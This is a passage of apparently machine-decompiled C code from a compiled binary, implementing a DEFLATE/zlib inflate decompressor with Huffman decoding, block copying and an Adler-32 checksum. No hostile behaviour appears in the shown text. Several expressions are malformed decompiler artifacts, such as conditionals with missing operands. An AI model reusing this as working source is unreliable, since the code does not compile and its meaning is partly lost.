                  										_t1350[0xa] = _v56;
                  										_t1350[0xf] = _v72;
                  										_t1350[0xe] = _t1141 - 0x00000001 & _v8;
                  										 *_a4 = _t1288 - _v76;
                  										_t782 = _v32 - _a12;
                  										_v32 = _t782;
                  										 *_a16 = _t782;
                  										if((_a20 & 0x00000009) == 0 || _t1113 < 0) {
                  											L360:
                  											return _t1113;
                  										} else {
                  											_a4 = 0x15b0;
                  											_t1291 = _t782 % _a4;
                  											_t1145 = _t1350[7];
                  											_t1365 = _t1145 & 0x0000ffff;
                  											_t1146 = _t1145 >> 0x10;
                  											_v68 = _t1291;
                  											if(_v32 == 0) {
                  												L357:
                  												_t1350[7] = (_t1146 << 0x10) + _t1365;
                  												if(_t1113 == 0 && (_a20 & 0x00000001) != 0) {
                  													_t785 = 0xfffffffe;
                  													_t1113 =  !=  ? _t785 : _t1113;
                  												}
                  												goto L360;
                  											}
                  											_t1351 = 0xfff1;
                  											do {
                  												_t786 = 0;
                  												_a16 = 0;
                  												if(_t1291 <= 7) {
                  													L351:
                  													if(_t786 >= _t1291) {
                  														goto L355;
                  													}
                  													_t1116 = _a12;
                  													_t1296 = _t1291 - _t786;
                  													do {
                  														_t1365 = _t1365 + ( *_t1116 & 0x000000ff);
                  														_t1116 =  &(_t1116[1]);
                  														_t1146 = _t1146 + _t1365;
                  														_t1296 = _t1296 - 1;
                  													} while (_t1296 != 0);
                  													_a12 = _t1116;
                  													goto L355;
                  												}
                  												_t1352 = _a16;
                  												_push(7);
                  												_t795 = 0 - _a12;
                  												_v80 = _t795;
                  												_t1115 = _t795;
                  												do {
                  													_t1352 =  &(_t1352[2]);
                  													_t1366 = _t1365 + ( *_a12 & 0x000000ff);
                  													_t1367 = _t1366 + (_a12[1] & 0x000000ff);
                  													_t1368 = _t1367 + (_a12[2] & 0x000000ff);
                  													_t1369 = _t1368 + (_a12[3] & 0x000000ff);
                  													_t1370 = _t1369 + (_a12[4] & 0x000000ff);
                  													_t1371 = _t1370 + (_a12[5] & 0x000000ff);
                  													_t1372 = _t1371 + (_a12[6] & 0x000000ff);
                  													_t1365 = _t1372 + (_a12[7] & 0x000000ff);
                  													_t813 =  &(_a12[8]);
                  													_t1146 = _t1146 + _t1366 + _t1367 + _t1368 + _t1369 + _t1370 + _t1371 + _t1372 + _t1365;
                  													_a12 = _t813;
                  												} while ( &(_t813[_t1115]) < _t1291);
                  												_a16 = _t1352;
                  												_t786 = _t1352;
                  												_t1351 = 0xfff1;
                  												goto L351;
                  												L355:
                  												_t1365 = _t1365 % _t1351;
                  												_t792 = _v32 - _v68;
                  												_t1146 = _t1146 % _t1351;
                  												_t1291 = _a4;
                  												_v32 = _t792;
                  												_v68 = _t1291;
                  											} while (_t792 != 0);
                  											_t1113 = _v20;
                  											_t1350 = _v64;
                  											goto L357;
                  										}
                  									} else {
                  										L339:
                  										_t815 = _v76;
                  										while(_t1288 > _t815) {
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												goto L343;
                  											}
                  											_t1288 = _t1288 - 1;
                  											_t1364 = _t1364 - 8;
                  											__eflags = _t1364;
                  										}
                  										goto L343;
                  									}
                  								}
                  								_t1373 = _v12;
                  								_t816 = _t771 - _t1139;
                  								_t1157 = _v36 - _t1288;
                  								__eflags = _t816 - _t1157;
                  								_t1158 =  <  ? _t816 : _t1157;
                  								__eflags = _t1158 - _t1373;
                  								_t1374 =  <  ? _t1158 : _t1373;
                  								memcpy(_v32, _t1288, _t1374);
                  								_t1379 = _t1379 + 0xc;
                  								_t1288 = _v16 + _t1374;
                  								_t1139 = _v32 + _t1374;
                  								_t819 = _v12 - _t1374;
                  								__eflags = _t819;
                  								_v16 = _t1288;
                  								_t1364 = _v48;
                  								_v32 = _t1139;
                  								_v12 = _t819;
                  								L61:
                  								__eflags = _t819;
                  								if(_t819 != 0) {
                  									L279:
                  									_t771 = _v60;
                  									__eflags = _t1139 - _t771;
                  									if(_t1139 < _t771) {
                  										goto L59;
                  									}
                  									_t1113 = 2;
                  									_v20 = _t1113;
                  									 *_t1350 = 9;
                  									goto L339;
                  								}
                  								L62:
                  								__eflags = _t1350[5] & 0x00000001;
                  								if((_t1350[5] & 0x00000001) != 0) {
                  									__eflags = _t1364 - (_t1364 & 0x00000007);
                  									if(_t1364 >= (_t1364 & 0x00000007)) {
                  										_t1117 = _v8;
                  										L311:
                  										_t822 = _v76;
                  										_t1161 = _t1364 & 0x00000007;
                  										_t1118 = _t1117 >> _t1161;
                  										_t1364 = _t1364 - _t1161;
                  										__eflags = _t1288 - _t822;
                  										if(_t1288 <= _t822) {
                  											L315:
                  											_t823 = _t1364;
                  											asm("bts edx, eax");
                  											__eflags = _t823 - 0x20;
                  											_t1163 =  >=  ? 0 : 0;
                  											_t1299 = 0 ^ _t1163;
                  											__eflags = _t823 - 0x40;
                  											_t1164 =  >=  ? _t1299 : _t1163;
                  											_t1119 = _t1118 & _t1299 - 0x00000001;
                  											__eflags = _a20 & 0x00000001;
                  											_v8 = _t1119;
                  											if((_a20 & 0x00000001) == 0) {
                  												L332:
                  												_t1288 = _v16;
                  												L333:
                  												_t1113 = 0;
                  												 *_t1350 = 0x22;
                  												L18:
                  												_t772 = _v24;
                  												goto L337;
                  											}
                  											_t1165 = 0;
                  											__eflags = 0;
                  											L317:
                  											_v12 = _t1165;
                  											__eflags = _t1165 - 4;
                  											if(_t1165 >= 4) {
                  												goto L332;
                  											}
                  											__eflags = _t1364;
                  											if(_t1364 == 0) {
                  												_t1288 = _v16;
                  												L327:
                  												__eflags = _t1288 - _v36;
                  												if(_t1288 >= _v36) {
                  													 *_t1350 = 0x2a;
                  													goto L335;
                  												}
                  												_t1166 =  *_t1288 & 0x000000ff;
                  												_t1301 = _t1288 + 1;
                  												__eflags = _t1301;
                  												_v16 = _t1301;
                  												L329:
                  												_t1350[4] = _t1350[4] << 0x00000008 | _t1166;
                  												_t1165 = _v12 + 1;
                  												goto L317;
                  											}
                  											__eflags = _t1364 - 8;
                  											if(_t1364 >= 8) {
                  												L324:
                  												_t1166 = _t1119 & 0x000000ff;
                  												_t1119 = _t1119 >> 8;
                  												_t1364 = _t1364 - 8;
                  												_v8 = _t1119;
                  												goto L329;
                  											}
                  											_t1288 = _v16;
                  											while(1) {
                  												L322:
                  												__eflags = _t1288 - _v36;
                  												if(_t1288 >= _v36) {
                  													break;
                  												}
                  												_t828 = ( *_t1288 & 0x000000ff) << _t1364;
                  												_t1288 = _t1288 + 1;
                  												_t1119 = _t1119 | _t828;
                  												_v16 = _t1288;
                  												_t1364 = _t1364 + 8;
                  												_v8 = _t1119;
                  												__eflags = _t1364 - 8;
                  												if(_t1364 < 8) {
                  													continue;
                  												}
                  												goto L324;
                  											}
                  											 *_t1350 = 0x29;
                  											goto L335;
                  										} else {
                  											goto L312;
                  										}
                  										while(1) {
                  											L312:
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												break;
                  											}
                  											_t1288 = _t1288 - 1;
                  											_t1364 = _t1364 - 8;
                  											__eflags = _t1288 - _t822;
                  											if(_t1288 > _t822) {
                  												continue;
                  											}
                  											break;
                  										}
                  										_v16 = _t1288;
                  										goto L315;
                  									} else {
                  										goto L306;
                  									}
                  									while(1) {
                  										L306:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t1169 = _t1364;
                  										_t1364 = _t1364 + 8;
                  										_t830 = ( *_t1288 & 0x000000ff) << _t1169;
                  										_t1288 = _t1288 + 1;
                  										_t1117 = _v8 | _t830;
                  										_v16 = _t1288;
                  										_v8 = _t1117;
                  										__eflags = _t1364 - (_t1364 & 0x00000007);
                  										if(_t1364 < (_t1364 & 0x00000007)) {
                  											continue;
                  										}
                  										goto L311;
                  									}
                  									 *_t1350 = 0x20;
                  									goto L335;
                  								}
                  								L63:
                  								_t1170 = _v8;
                  								L66:
                  								__eflags = _t1364 - 3;
                  								if(_t1364 < 3) {
                  									L64:
                  									__eflags = _t1288 - _v36;
                  									if(_t1288 >= _v36) {
                  										 *_t1350 = 3;
                  										goto L335;
                  									}
                  									_t834 = ( *_t1288 & 0x000000ff) << _t1364;
                  									_t1288 = _t1288 + 1;
                  									_t1170 = _v8 | _t834;
                  									_v16 = _t1288;
                  									_v8 = _t1170;
                  									_t1364 = _t1364 + 8;
                  									__eflags = _t1364;
                  									goto L66;
                  								}
                  								_t1364 = _t1364 - 3;
                  								_t836 = _t1170 & 0x00000007;
                  								_t1350[5] = _t836;
                  								_t837 = _t836 >> 1;
                  								__eflags = _t837;
                  								_v8 = _t1170 >> 3;
                  								_v48 = _t1364;
                  								_t1350[6] = _t837;
                  								if(_t837 == 0) {
                  									L253:
                  									__eflags = _t1364 - (_t1364 & 0x00000007);
                  									if(_t1364 < (_t1364 & 0x00000007)) {
                  										L251:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											 *_t1350 = 5;
                  											goto L335;
                  										}
                  										_t841 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t841;
                  										_t1364 = _t1364 + 8;
                  										__eflags = _t1364;
                  										_v16 = _t1288;
                  										goto L253;
                  									}
                  									_t1176 = _t1364 & 0x00000007;
                  									_t843 = _v8 >> _t1176;
                  									_t1364 = _t1364 - _t1176;
                  									_v8 = _t843;
                  									_t1177 = 0;
                  									__eflags = 0;
                  									_v48 = _t1364;
                  									L255:
                  									_v12 = _t1177;
                  									__eflags = _t1177 - 4;
                  									if(_t1177 >= 4) {
                  										_v12 = (_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff;
                  										_t819 = _v12;
                  										__eflags = _t819 - (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff);
                  										if(_t819 != (((_t1350[0xa48] & 0x000000ff) << 0x00000008 | _t1350[0xa48] & 0x000000ff) ^ 0x0000ffff)) {
                  											L304:
                  											_v20 = _t1113;
                  											 *_t1350 = 0x27;
                  											goto L339;
                  										}
                  										_t1139 = _v32;
                  										L267:
                  										__eflags = _t819;
                  										if(_t819 == 0) {
                  											goto L62;
                  										}
                  										__eflags = _t1364;
                  										if(_t1364 == 0) {
                  											goto L61;
                  										}
                  										__eflags = _t1364 - 8;
                  										if(_t1364 >= 8) {
                  											_t1185 = _v8;
                  											L274:
                  											_t846 = _t1185 & 0x000000ff;
                  											_t1364 = _t1364 - 8;
                  											_v44 = _t846;
                  											_v8 = _t1185 >> 8;
                  											_v48 = _t1364;
                  											L276:
                  											_t1187 = _v32;
                  											__eflags = _t1187 - _v60;
                  											if(_t1187 >= _v60) {
                  												_t1113 = 2;
                  												_v20 = _t1113;
                  												 *_t1350 = 0x34;
                  												goto L339;
                  											}
                  											 *_t1187 = _t846;
                  											_t1139 =  &(_t1187[0]);
                  											_t819 = _v12 - 1;
                  											_v32 = _t1139;
                  											_v12 = _t819;
                  											goto L267;
                  										} else {
                  											goto L270;
                  										}
                  										while(1) {
                  											L270:
                  											__eflags = _t1288 - _v36;
                  											if(_t1288 >= _v36) {
                  												break;
                  											}
                  											_t849 = ( *_t1288 & 0x000000ff) << _t1364;
                  											_t1288 = _t1288 + 1;
                  											_t1364 = _t1364 + 8;
                  											_t1185 = _v8 | _t849;
                  											_v16 = _t1288;
                  											_v8 = _t1185;
                  											__eflags = _t1364 - 8;
                  											if(_t1364 < 8) {
                  												continue;
                  											}
                  											goto L274;
                  										}
                  										 *_t1350 = 0x33;
                  										goto L335;
                  									}
                  									__eflags = _t1364;
                  									if(_t1364 == 0) {
                  										L262:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											 *_t1350 = 7;
                  											goto L335;
                  										}
                  										_t850 =  *_t1288;
                  										_t1288 = _t1288 + 1;
                  										__eflags = _t1288;
                  										 *(_t1177 +  &(_t1350[0xa48])) = _t850;
                  										_t843 = _v8;
                  										_v16 = _t1288;
                  										L264:
                  										_t1177 = _t1177 + 1;
                  										goto L255;
                  									}
                  									__eflags = _t1364 - 8;
                  									if(_t1364 >= 8) {
                  										L261:
                  										 *(_t1177 +  &(_t1350[0xa48])) = _t843;
                  										_t843 = _t843 >> 8;
                  										_t1364 = _t1364 - 8;
                  										_v8 = _t843;
                  										_v48 = _t1364;
                  										goto L264;
                  									} else {
                  										goto L258;
                  									}
                  									while(1) {
                  										L258:
                  										__eflags = _t1288 - _v36;
                  										if(_t1288 >= _v36) {
                  											break;
                  										}
                  										_t852 = ( *_t1288 & 0x000000ff) << _t1364;
                  										_t1288 = _t1288 + 1;
                  										_v8 = _v8 | _t852;
                  										_t1364 = _t1364 + 8;
                  										_v16 = _t1288;
                  										__eflags = _t1364 - 8;
                  										if(_t1364 < 8) {
                  											continue;
                  										}
                  										_t1177 = _v12;
                  										_t843 = _v8;
                  										goto L261;
                  									}
                  									 *_t1350 = 6;
                  									goto L335;
                  								}
                  								__eflags = _t837 - 3;
                  								if(_t837 == 3) {
                  									L298:
                  									_v20 = _t1113;
                  									 *_t1350 = 0xa;
                  									goto L339;
                  								}
                  								__eflags = _t837 - _v24;
                  								if(_t837 != _v24) {
                  									_t1191 = 0;
                  									__eflags = 0;
                  									L72:
                  									_v12 = _t1191;
                  									__eflags = _t1191 - 3;
                  									if(_t1191 < 3) {
                  										L83:
                  										_t146 = _t1191 + 0x411014; // 0x40505
                  										_t853 =  *_t146;
                  										_v28 = _t853;
                  										__eflags = _t1364 - _t853;
                  										if(_t1364 < _t853) {
                  											L81:
                  											__eflags = _t1288 - _v36;
                  											if(_t1288 >= _v36) {
                  												 *_t1350 = 0xb;
                  												goto L335;
                  											}
                  											_t855 = ( *_t1288 & 0x000000ff) << _t1364;
                  											_t1288 = _t1288 + 1;
                  											_v8 = _v8 | _t855;
                  											_t1364 = _t1364 + 8;
                  											__eflags = _t1364;
                  											_t1191 = _v12;
                  											_v16 = _t1288;
                  											goto L83;
                  										}
                  										_t1302 =  &(_t1350[_t1191]);
                  										_t1302[0xb] = (_v24 << _v28) - 0x00000001 & _v8;
                  										_t155 = _v12 + 0x411014; // 0x40505
                  										_t1194 =  *_t155;
                  										_v8 = _v8 >> _t1194;
                  										_t1364 = _t1364 - _t1194;
                  										_t1195 = _v12;
                  										_v48 = _t1364;
                  										_t1302[0xb] = _t1302[0xb] +  *((intOrPtr*)(0x411a48 + _t1195 * 4));
                  										_t1191 = _t1195 + 1;
                  										_t1288 = _v16;
                  										goto L72;
                  									}
                  									memset( &(_t1350[0x6e0]), 0, 0x120);
                  									_t1303 = _v8;
                  									_t1379 = _t1379 + 0xc;
                  									_t864 = 0;
                  									__eflags = 0;
                  									L74:
                  									_v12 = _t864;
                  									__eflags = _t864 - _t1350[0xd];
                  									if(_t864 >= _t1350[0xd]) {
                  										_t1350[0xd] = 0x13;
                  										L86:
                  										_t865 = _t1350[6];
                  										__eflags = _t865;
                  										if(_t865 < 0) {
                  											L153:
                  											_t1288 = _v16;
                  											L154:
                  											_t1197 = _v36 - _t1288;
                  											__eflags = _t1197 - 4;
                  											if(_t1197 < 4) {
                  												L173:
                  												__eflags = _t1364 - 0xf;
                  												if(_t1364 >= 0xf) {
                  													L178:
                  													_t1198 = _v8;
                  													L179:
                  													_t868 =  *((short*)(_t1350 + 0x160 + (_t1198 & 0x000003ff) * 2));
                  													_v12 = _t868;
                  													__eflags = _t868;
                  													if(_t868 < 0) {
                  														_t1199 = 0xa;
                  														do {
                  															_v12 =  !_v12;
                  															_t872 = (_v8 >> _t1199 & 0x00000001) + _v12;
                  															_t1199 = _t1199 + 1;
                  															_t873 =  *((short*)(_t1350 + 0x960 + _t872 * 2));
                  															_v12 = _t873;
                  															__eflags = _t873;
                  														} while (_t873 < 0);
                  														L191:
                  														_v8 = _v8 >> _t1199;
                  														_t1364 = _t1364 - _t1199;
                  														__eflags = _t873 - 0x100;
                  														if(_t873 >= 0x100) {
                  															L198:
                  															_t874 = _t873 & 0x000001ff;
                  															_v12 = _t874;
                  															__eflags = _t874 - 0x100;
                  															if(_t874 == 0x100) {
                  																goto L62;
                  															}
                  															_t875 = _t874 * 4 - 0x404;
                  															_t1200 =  *(_t875 + 0x411020);
                  															_v56 = _t1200;
                  															_v12 =  *((intOrPtr*)(_t875 + 0x411a58));
                  															__eflags = _t1200;
                  															if(_t1200 == 0) {
                  																L205:
                  																__eflags = _t1364 - 0xf;
                  																if(_t1364 >= 0xf) {
                  																	L210:
                  																	_t1201 = _v8;
                  																	L211:
                  																	_t879 =  *((short*)(_t1350 + 0xf00 + (_t1201 & 0x000003ff) * 2));
                  																	_v28 = _t879;
                  																	__eflags = _t879;
                  																	if(_t879 < 0) {
                  																		_t1121 = _v28;
                  																		_t1321 = _v8;
                  																		_t1202 = 0xa;
                  																		do {
                  																			_t883 = (_t1321 >> _t1202 & 0x00000001) +  !_t1121;
                  																			_t1202 = _t1202 + 1;
                  																			_t1121 =  *((short*)(_t1350 + 0x1700 + _t883 * 2));
                  																			__eflags = _t1121;
                  																		} while (_t1121 < 0);
                  																		_t1288 = _v16;
                  																		_v28 = _t1121;
                  																		_t1113 = _t1121 | 0xffffffff;
                  																		__eflags = _t1113;
                  																		_t884 = _v28;
                  																		L224:
                  																		_v8 = _v8 >> _t1202;
                  																		_t1364 = _t1364 - _t1202;
                  																		_t1203 =  *(0x4110a0 + _t884 * 4);
                  																		_t885 =  *((intOrPtr*)(0x411120 + _t884 * 4));
                  																		_v56 = _t1203;
                  																		_v44 = _t885;
                  																		__eflags = _t1203;
                  																		if(_t1203 == 0) {
                  																			L230:
                  																			_t1205 = _v32 - _a8;
                  																			_v72 = _t1205;
                  																			__eflags = _t885 - _t1205;
                  																			if(_t885 <= _t1205) {
                  																				L232:
                  																				_t1350 = _v64;
                  																				_t1208 = (_t1205 - _t885 & _v68) + _a8;
                  																				__eflags = _v32 - _t1208;
                  																				_t887 =  >  ? _v32 : _t1208;
                  																				_t888 = ( >  ? _v32 : _t1208) + _v12;
                  																				__eflags = ( >  ? _v32 : _t1208) + _v12 - _v60;
                  																				if(( >  ? _v32 : _t1208) + _v12 <= _v60) {
                  																					_t889 = _v12;
                  																					__eflags = _t889 - 9;
                  																					if(_t889 < 9) {
                  																						L246:
                  																						_t1322 = _v32;
                  																						do {
                  																							_t890 =  *_t1208;
                  																							_t1208 = _t1208 + 3;
                  																							 *_t1322 = _t890;
                  																							 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 - 2));
                  																							 *((char*)(_t1322 + 2)) =  *((intOrPtr*)(_t1208 - 1));
                  																							_t1322 = _t1322 + 3;
                  																							_t894 = _v12 - 3;
                  																							_v12 = _t894;
                  																							__eflags = _t894 - 2;
                  																						} while (_t894 > 2);
                  																						_v32 = _t1322;
                  																						__eflags = _t894;
                  																						if(_t894 <= 0) {
                  																							goto L153;
                  																						}
                  																						 *_t1322 =  *_t1208;
                  																						_t934 = _v12;
                  																						__eflags = _t934 - 1;
                  																						if(_t934 <= 1) {
                  																							L245:
                  																							_v32 = _t1322 + _t934;
                  																							goto L153;
                  																						}
                  																						L244:
                  																						 *((char*)(_t1322 + 1)) =  *((intOrPtr*)(_t1208 + 1));
                  																						_t934 = _v12;
                  																						goto L245;
                  																					}
                  																					__eflags = _t889 - _v44;
                  																					if(_t889 > _v44) {
                  																						goto L246;
                  																					}
                  																					_t1126 = _v32;
                  																					_t1326 = (_t889 & 0xfffffff8) + _t1208;
                  																					__eflags = _t1326;
                  																					do {
                  																						 *_t1126 =  *_t1208;
                  																						_t937 =  *((intOrPtr*)(_t1208 + 4));
                  																						_t1208 = _t1208 + 8;
                  																						 *((intOrPtr*)(_t1126 + 4)) = _t937;
                  																						_t1126 = _t1126 + 8;
                  																						__eflags = _t1208 - _t1326;
                  																					} while (_t1208 < _t1326);
                  																					_t939 = _v12 & 0x00000007;
                  																					_v32 = _t1126;
                  																					_t1113 = _t1126 | 0xffffffff;
                  																					_v12 = _t939;
                  																					__eflags = _t939 - 3;
                  																					if(_t939 >= 3) {
                  																						goto L246;
                  																					}
                  																					__eflags = _t939;
                  																					if(_t939 == 0) {
                  																						goto L153;
                  																					}
                  																					_t1322 = _v32;
                  																					 *_t1322 =  *_t1208;
                  																					_t934 = _v12;
                  																					__eflags = _t934 - 1;
                  																					if(_t934 <= 1) {
                  																						goto L245;
                  																					}
                  																					goto L244;
                  																				}
                  																				_t1138 = _v12;
                  																				L234:
                  																				_t941 = _t1138;
                  																				_t1138 = _t1138 - 1;
                  																				_v12 = _t1138;
                  																				__eflags = _t941;
                  																				if(_t941 == 0) {
                  																					goto L153;
                  																				}
                  																				L235:
                  																				__eflags = _v32 - _v60;
                  																				if(_v32 >= _v60) {
                  																					_t1113 = 2;
                  																					_v20 = _t1113;
                  																					 *_t1350 = 0x35;
                  																					goto L339;
                  																				}
                  																				_v32 = _v32 + 1;
                  																				_v72 = _v72 + 1;
                  																				 *_v32 =  *((intOrPtr*)((_v72 - _v44 & _v68) + _a8));
                  																				_t1350 = _v64;
                  																				goto L234;
                  																			}
                  																			__eflags = _a20 & 0x00000004;
                  																			if((_a20 & 0x00000004) != 0) {
                  																				L296:
                  																				_v20 = _t1113;
                  																				 *_t1350 = 0x25;
                  																				goto L339;
                  																			}
                  																			goto L232;
                  																		}
                  																		L228:
                  																		__eflags = _t1364 - _t1203;
                  																		if(_t1364 < _t1203) {
                  																			L226:
                  																			__eflags = _t1288 - _v36;
                  																			if(_t1288 >= _v36) {
                  																				 *_t1350 = 0x1b;
                  																				goto L335;
                  																			}
                  																			_t948 = ( *_t1288 & 0x000000ff) << _t1364;
                  																			_t1288 = _t1288 + 1;
                  																			_v8 = _v8 | _t948;
                  																			_t1364 = _t1364 + 8;
                  																			__eflags = _t1364;
                  																			_t1203 = _v56;
                  																			_v16 = _t1288;
                  																			goto L228;
                  																		}
                  																		_t1364 = _t1364 - _t1203;
                  																		_v8 = _v8 >> _t1203;
                  																		_t534 =  &_v44;
                  																		 *_t534 = _v44 + ((_v24 << _t1203) - 0x00000001 & _v8);
                  																		__eflags =  *_t534;
                  																		_t885 = _v44;
                  																		goto L230;
                  																	}
                  																	_t1202 = _t879 >> 9;
                  																	_t884 = _t879 & 0x000001ff;
                  																	goto L224;
                  																}
                  																__eflags = _v36 - _t1288 - 2;
                  																if(_v36 - _t1288 >= 2) {
                  																	_t502 = _t1288 + 1; // 0x83c84d8d
                  																	_t1201 = _v8 | ( *_t502 & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  																	_t1288 = _v16 + 2;
                  																	_v8 = _t1201;
                  																	_v16 = _t1288;
                  																	_t1364 = _t1364 + 0x10;
                  																	goto L211;
                  																}
                  																L207:
                  																_t960 =  *((short*)(_t1350 + 0xf00 + (_v8 & 0x000003ff) * 2));
                  																_v40 = _t960;
                  																__eflags = _t960;
                  																if(_t960 < 0) {
                  																	__eflags = _t1364 - 0xa;
                  																	if(_t1364 <= 0xa) {
                  																		L217:
                  																		__eflags = _t1288 - _v36;
                  																		if(_t1288 >= _v36) {
                  																			 *_t1350 = 0x1a;
                  																			goto L335;
                  																		}
                  																		_t962 = ( *_t1288 & 0x000000ff) << _t1364;
                  																		_t1288 = _t1288 + 1;
                  																		_t1364 = _t1364 + 8;
                  																		_t1201 = _v8 | _t962;
                  																		_v16 = _t1288;
                  																		_v8 = _t1201;
                  																		__eflags = _t1364 - 0xf;
                  																		if(_t1364 < 0xf) {
                  																			goto L207;
                  																		}
                  																		goto L211;
                  																	}
                  																	_t1216 = 0xa;
                  																	_v28 = _t1216;
                  																	while(1) {
                  																		_t1219 =  *((short*)(_t1350 + 0x1700 + ((_v8 >> _t1216 & _v24) +  !_v40) * 2));
                  																		_t968 = _v28 + 1;
                  																		_v40 = _t1219;
                  																		_v28 = _t968;
                  																		__eflags = _t1219;
                  																		if(_t1219 >= 0) {
                  																			goto L210;
                  																		}
                  																		_t1216 = _v28;
                  																		__eflags = _t1364 - _t968 + 1;
                  																		if(_t1364 >= _t968 + 1) {
                  																			continue;
                  																		}
                  																		goto L217;
                  																	}
                  																	goto L210;
                  																}
                  																_t970 = _t960 >> 9;
                  																__eflags = _t970;
                  																if(_t970 == 0) {
                  																	goto L217;
                  																}
                  																__eflags = _t1364 - _t970;
                  																if(_t1364 < _t970) {
                  																	goto L217;
                  																}
                  																goto L210;
                  															}
                  															L203:
                  															__eflags = _t1364 - _t1200;
                  															if(_t1364 < _t1200) {
                  																L201:
                  																__eflags = _t1288 - _v36;
                  																if(_t1288 >= _v36) {
                  																	 *_t1350 = 0x19;
                  																	goto L335;
                  																}
                  																_t972 = ( *_t1288 & 0x000000ff) << _t1364;
                  																_t1288 = _t1288 + 1;
                  																_v8 = _v8 | _t972;
                  																_t1364 = _t1364 + 8;
                  																__eflags = _t1364;
                  																_t1200 = _v56;
                  																_v16 = _t1288;
                  																goto L203;
                  															}
                  															_t1364 = _t1364 - _t1200;
                  															_v8 = _v8 >> _t1200;
                  															_t474 =  &_v12;
                  															 *_t474 = _v12 + ((_v24 << _t1200) - 0x00000001 & _v8);
                  															__eflags =  *_t474;
                  															goto L205;
                  														}
                  														L194:
                  														_t1221 = _v32;
                  														__eflags = _t1221 - _v60;
                  														if(_t1221 >= _v60) {
                  															_t1113 = 2;
                  															_v20 = _t1113;
                  															 *_t1350 = 0x18;
                  															goto L339;
                  														}
                  														 *_t1221 = _t873;
                  														_t1222 =  &(_t1221[0]);
                  														__eflags = _t1222;
                  														L196:
                  														_v32 = _t1222;
                  														goto L154;
                  													}
                  													_t1199 = _t868 >> 9;
                  													_t873 = _t868 & 0x000001ff;
                  													_v12 = _t873;
                  													goto L191;
                  												}
                  												__eflags = _t1197 - 2;
                  												if(_t1197 >= 2) {
                  													_t1198 = _v8 | ( *(_t1288 + 1) & 0x000000ff) << _t1364 + 0x00000008 | ( *_v16 & 0x000000ff) << _t1364;
                  													_t1288 = _v16 + 2;
                  													_v8 = _t1198;
                  													_v16 = _t1288;
                  													_t1364 = _t1364 + 0x10;
                  													goto L179;
                  												}
                  												L175:
                  												_t900 =  *((short*)(_t1350 + 0x160 + (_v8 & 0x000003ff) * 2));
                  												_v40 = _t900;
                  												__eflags = _t900;
                  												if(_t900 < 0) {
                  													__eflags = _t1364 - 0xa;
                  													if(_t1364 <= 0xa) {
                  														L185:
                  														__eflags = _t1288 - _v36;
                  														if(_t1288 >= _v36) {
                  															 *_t1350 = 0x17;
                  															goto L335;
                  														}
                  														_t902 = ( *_t1288 & 0x000000ff) << _t1364;
                  														_t1288 = _t1288 + 1;
                  														_t1364 = _t1364 + 8;
                  														_t1198 = _v8 | _t902;
                  														_v16 = _t1288;
                  														_v8 = _t1198;
                  														__eflags = _t1364 - 0xf;
                  														if(_t1364 < 0xf) {
                  															goto L175;
                  														}
                  														goto L179;
                  													}
                  													_t1229 = 0xa;
                  													_v28 = _t1229;
                  													while(1) {
                  														_t1232 =  *((short*)(_t1350 + 0x960 + ((_v8 >> _t1229 & _v24) +  !_v40) * 2));
                  														_t908 = _v28 + 1;
                  														_v40 = _t1232;
                  														_v28 = _t908;
                  														__eflags = _t1232;
                  														if(_t1232 >= 0) {
                  															goto L178;
                  														}
                  														_t1229 = _v28;
                  														__eflags = _t1364 - _t908 + 1;
                  														if(_t1364 >= _t908 + 1) {
                  															continue;
                  														}
                  														goto L185;
                  													}
                  													goto L178;
                  												}
                  												_t910 = _t900 >> 9;
                  												__eflags = _t910;
                  												if(_t910 == 0) {
                  													goto L185;
                  												}
                  												__eflags = _t1364 - _t910;
                  												if(_t1364 < _t910) {
                  													goto L185;
                  												}
                  												goto L178;
                  											}
                  											_t1113 = 0xffffffff;
                  											__eflags = _v60 - _v32 - 2;
                  											if(_v60 - _v32 < 2) {
                  												goto L173;
                  											}
                  											__eflags = _t1364 - 0xf;
                  											if(_t1364 >= 0xf) {
                  												_t913 = _v8;
                  											} else {
                  												_t913 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
                  												_t1288 = _v16 + 2;
                  												_v8 = _t913;
                  												_v16 = _t1288;
                  												_t1364 = _t1364 + 0x10;
                  											}
                  											_t915 =  *((short*)(_t1350 + 0x160 + (_t913 & 0x000003ff) * 2));
                  											_v12 = _t915;
                  											__eflags = _t915;
                  											if(_t915 < 0) {
                  												_t1233 = 0xa;
                  												do {
                  													_v12 =  !_v12;
                  													_t919 = (_v8 >> _t1233 & 0x00000001) + _v12;
                  													_t1233 = _t1233 + 1;
                  													_t873 =  *((short*)(_t1350 + 0x960 + _t919 * 2));
                  													_v12 = _t873;
                  													__eflags = _t873;
                  												} while (_t873 < 0);
                  												goto L163;
                  											} else {
                  												_t1233 = _t915 >> 9;
                  												L163:
                  												_v8 = _v8 >> _t1233;
                  												_t1364 = _t1364 - _t1233;
                  												__eflags = _t873 & 0x00000100;
                  												if((_t873 & 0x00000100) != 0) {
                  													goto L198;
                  												}
                  												__eflags = _t1364 - 0xf;
                  												if(_t1364 >= 0xf) {
                  													_t920 = _v8;
                  												} else {
                  													_t920 = _v8 | (( *(_t1288 + 1) & 0x000000ff) << 0x00000008 |  *_v16 & 0x000000ff) << _t1364;
                  													_t1288 = _v16 + 2;
                  													_v8 = _t920;
                  													_v16 = _t1288;
                  													_t1364 = _t1364 + 0x10;
                  												}
                  												_t922 =  *((short*)(_t1350 + 0x160 + (_t920 & 0x000003ff) * 2));
                  												_v28 = _t922;
                  												__eflags = _t922;
                  												if(_t922 < 0) {
                  													_t1234 = 0xa;
                  													_v40 = _t1234;
                  													do {
                  														_t926 = (_v8 >> _t1234 & _v24) +  !_v28;
                  														_t1234 = _v40 + 1;
